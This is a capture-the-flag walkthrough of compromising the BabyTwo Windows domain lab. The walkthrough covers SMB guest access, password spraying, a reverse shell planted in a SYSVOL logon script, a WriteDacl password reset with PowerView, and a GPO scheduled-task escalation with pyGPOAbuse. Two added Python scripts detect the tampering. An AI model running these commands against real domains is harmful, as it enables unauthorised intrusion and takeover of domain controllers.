BabyTwo
(Medium, Windows, Vulnlab Machine)

OVERVIEW

So we are given the IP address of the machine, so let's head to Nmap and scan it.

As you can see, we found the open ports, the machine's hostname and its DC name, so add both names to /etc/hosts.

Since we don't have a user password, let's just try the guest login, with guest as the username and an empty password:
nxc smb 10.129.179.22 -u guest -p ''

Here we go, guest is allowed to access the SMB server, so now let's use smbmap to list the shares:
smbmap -H 10.129.179.22 -u guest -p ''

We can see there is a share named homes on which the guest user has READ,WRITE access.
So let's access the share using smbclient:
smbclient -U 'guest%' '//baby2.vl/homes'

We successfully got access to the share, and inside it we can see a list of users, so let's save the usernames to a file.
Now we have users but not their passwords, so there is a slight chance that some of them are using their name as both USERNAME and PASSWORD.
Let's check that by spraying each username as its own password with netexec (--no-bruteforce pairs the two lists line by line instead of trying every combination):
nxc smb 10.129.179.22 -u users.txt -p users.txt --no-bruteforce --continue-on-success

Got two users who set their username as their password, so now let's list the shares again with smbmap using either of those users.

We got READ and WRITE access on the docs and apps shares.
So let's check them out:

When I checked, it was empty, so let's check the SYSVOL share too.

I saw a login.vbs file, so let's see what it consists of:
Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")
    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    ' EnumNetworkDrives returns pairs: the drive letter at even indexes, the UNC path at odd ones
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next
    ' Remove a stale mapping (forced, and dropped from the persistent profile) before mapping again
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
    Set objNetwork = Nothing
End Sub

' Map the apps and docs shares on the DC for every user who runs this logon script
MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"
This script is a logon script for users and it maps network shares, which means it is executed every time a user logs in. Since we have write access to these two shares, we can embed a malicious reverse shell inside this file so that when a user logs in it will be executed and give us a shell.
USER FLAG / LOCAL SHELL
So first let's head to revshells.com and go to the PowerShell base64 payloads.

NOTE: keep in mind to change the LOCAL MACHINE IP and port.
Now edit the login.vbs file on your local machine and put the commands below in it:
Set oShell = CreateObject("WScript.Shell")
oShell.run "your-powershell-payload"

Now go back to the SMB shell, remove the file, then put it again from the directory where you saved your login.vbs:
del login.vbs
put login.vbs

Start a netcat listener on that port on your local machine and you will get a shell.


So we are logged in as amelia.griffiths.
Now go to C:\ and get the user flag.
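From the defender's side, the login.vbs overwrite above shows up as write or delete access to a script under SYSVOL\<domain>\scripts in the DC's share-access audit log. The following is an added example (not from the original write-up) that flags such access from constructed Event ID 5145 records; the pipe-separated export format, the source IPs and the trusted-account list are assumptions.

```python
"""Flag write/delete access to logon scripts in SYSVOL or NETLOGON from
Windows share-access audit records (Event ID 5145). Added example, not part
of the original write-up; the sample records are constructed and use a simple
pipe-separated export format (real exports need a different splitter)."""
import re

# Access-mask bits that let a principal change or replace a file.
WRITE_BITS = {0x2: "WriteData", 0x4: "AppendData", 0x40: "DeleteChild",
              0x10000: "Delete", 0x40000: "WriteDAC", 0x80000: "WriteOwner"}
# Logon scripts live under <domain>\scripts in SYSVOL (also exposed as NETLOGON).
SCRIPT_RE = re.compile(r"scripts[\\/].*\.(vbs|bat|cmd|ps1)$", re.IGNORECASE)
# Accounts expected to edit logon scripts (constructed allow-list).
TRUSTED = {"BABY2\\Administrator"}

# Constructed sample: event_id|account|source_ip|share|relative_target|access_mask
SAMPLE_LOG = r"""
5145|BABY2\amelia.griffiths|10.10.14.5|\\*\SYSVOL|baby2.vl\scripts\login.vbs|0x1
5145|BABY2\Carl.Moore|10.10.14.5|\\*\SYSVOL|baby2.vl\scripts\login.vbs|0x10000
5145|BABY2\Carl.Moore|10.10.14.5|\\*\SYSVOL|baby2.vl\scripts\login.vbs|0x2
5145|BABY2\Administrator|10.0.0.10|\\*\SYSVOL|baby2.vl\scripts\login.vbs|0x2
5145|BABY2\Carl.Moore|10.10.14.5|\\*\docs|notes.txt|0x2
"""

def parse_event(line):
    """Split one record into a dict; return None for anything that is not a 5145."""
    parts = line.split("|")
    if len(parts) != 6 or parts[0] != "5145":
        return None
    return {"account": parts[1], "src": parts[2], "share": parts[3],
            "target": parts[4], "mask": int(parts[5], 16)}

def is_logon_script(share, target):
    """True when the target is a script inside the scripts folder of SYSVOL/NETLOGON."""
    return share.upper().endswith(("SYSVOL", "NETLOGON")) and bool(SCRIPT_RE.search(target))

def find_script_tampering(log_text, trusted=TRUSTED):
    """Return (account, src, target, rights) for every untrusted write to a logon script."""
    alerts = []
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        if ev is None or ev["account"] in trusted or not is_logon_script(ev["share"], ev["target"]):
            continue
        rights = [name for bit, name in WRITE_BITS.items() if ev["mask"] & bit]
        if rights:  # read-only access (0x1) never reaches here
            alerts.append((ev["account"], ev["src"], ev["target"], rights))
    return alerts

if __name__ == "__main__":
    for alert in find_script_tampering(SAMPLE_LOG):
        print("ALERT logon script modified:", alert)
```

On a real DC this needs "Audit Detailed File Share" enabled; without it no 5145 events are written at all.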
PRIVILEGE ESCALATION / ROOT FLAG
Now remember we have Carl.Moore's ID and password, so we can run BloodHound with it:
bloodhound-python -u Carl.Moore -p Carl.Moore -d baby2.vl -ns 10.129.179.22 -c ALL --zip

Now let's analyze the data in BloodHound: start neo4j and open BloodHound.


As you can see, we own the Amelia Griffiths user, and the shortest path from owned principals is shown above: she is a member of LEGACY@BABY2.VL, which has WriteDacl over the user GPOADM@BABY2.VL. After owning that user we can use its GenericAll for privilege escalation.
WRITEDACL
To do this attack you need the PowerView.ps1 module, so first git clone or download it from https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon to your local machine.
Now start a local Python web server in the directory where you downloaded PowerView.ps1:
python3 -m http.server 8000
and in the shell (PS C:\Temp>) download the module from your local machine and import it:
Invoke-WebRequest -Uri 'http://LOCAL-SERVER-IP:8000/PowerView.ps1' -OutFile 'C:\Temp\PowerView.ps1'
. C:\Temp\PowerView.ps1
Now that PowerView.ps1 is imported, run the following to grant ourselves rights over gpoadm and change its password:
add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"
$cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
set-domainuserpassword gpoadm -accountpassword $cred

Here we go, our WriteDacl attack was successful.
GENERIC ALL
Now let's get the root shell using the GenericAll method, which in this case is an ACL over the Group Policy Objects.
For this we will use the pyGPOAbuse tool.
In your local machine terminal use the command below; the PowerShell rev shell is the same as before (don't include the leading "powershell -e", only the base64 part).
BE SURE TO USE A DIFFERENT PORT FROM BEFORE TO AVOID GETTING THE SAME LOCAL SHELL AGAIN.
python3 pygpoabuse.py baby2.vl/gpoadm:'Password123!' -command "powershell -exec bypass -enc base64-rev-powershell" -dc-ip ATTACK-MACHINE-IP -gpo-id "YOUR-GPO-ID"
You will get your GPO ID from BloodHound, in the Node properties section.

Example cmd:

Schedule Task is successfully created.
Now go to the local shell you got earlier and run the command below to apply the policy and trigger the root shell:
gpupdate

Now start the netcat listener on the new port:
nc -lvnp 9000

Here We Go !!
We got the root shell, now get root.txt from C:\Users\Administrator\root.txt.
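A scheduled task pushed through a GPO is stored in SYSVOL as a ScheduledTasks.xml under the GPO's Machine\Preferences\ScheduledTasks folder, so that file is where a defender finds the task created above. The following is an added example (mine, not the write-up's or pyGPOAbuse's code) that audits such a file for immediate tasks running encoded PowerShell as SYSTEM; the XML is constructed with the clsid attributes omitted, and the task names and timestamps are made up.

```python
"""Audit a GPO's ScheduledTasks.xml for immediate tasks that run encoded
PowerShell as SYSTEM. Added example, not from the write-up or pyGPOAbuse; the
XML is constructed (clsid attributes omitted) but keeps the GPP layout."""
import base64
import re
import xml.etree.ElementTree as ET

# Constructed sample: one immediate task (the kind a GPO push creates) and one benign task.
SAMPLE_XML = r"""<ScheduledTasks>
  <ImmediateTaskV2 name="TASK_4f2a" changed="2024-05-01 10:00:00"><Properties action="C" name="TASK_4f2a" runAs="NT AUTHORITY\System" logonType="S4U">
    <Task version="1.3"><Actions Context="Author"><Exec><Command>powershell</Command><Arguments>-exec bypass -enc SQBFAFgA</Arguments></Exec></Actions></Task>
  </Properties></ImmediateTaskV2>
  <TaskV2 name="Inventory" changed="2023-01-10 08:00:00"><Properties action="C" name="Inventory" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken">
    <Task version="1.3"><Actions Context="Author"><Exec><Command>C:\Windows\System32\gpupdate.exe</Command><Arguments>/target:computer</Arguments></Exec></Actions></Task>
  </Properties></TaskV2>
</ScheduledTasks>"""
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(arguments):
    """Return the UTF-16LE text behind a PowerShell -enc argument, or None."""
    m = ENC_RE.search(arguments or "")
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def audit_scheduled_tasks(xml_text):
    """One finding per task; 'suspicious' marks immediate SYSTEM tasks running encoded PowerShell."""
    findings = []
    for task in ET.fromstring(xml_text):
        props = task.find("Properties")
        exec_el = task.find(".//Exec")
        cmd = exec_el.findtext("Command", "") if exec_el is not None else ""
        args = exec_el.findtext("Arguments", "") if exec_el is not None else ""
        run_as = props.get("runAs", "") if props is not None else ""
        decoded = decode_encoded_command(args)
        suspicious = (task.tag.startswith("ImmediateTask") and "system" in run_as.lower()
                      and "powershell" in cmd.lower() and decoded is not None)
        findings.append({"name": task.get("name"), "kind": task.tag, "run_as": run_as,
                         "command": cmd, "arguments": args, "decoded": decoded,
                         "changed": task.get("changed"), "suspicious": suspicious})
    return findings
```

The decoded command is returned so the triage note can say what the task would have run; pair this with the GPO's gpt.ini version bump, since the push also increments it.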
WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com
THANKS FOR READING !!!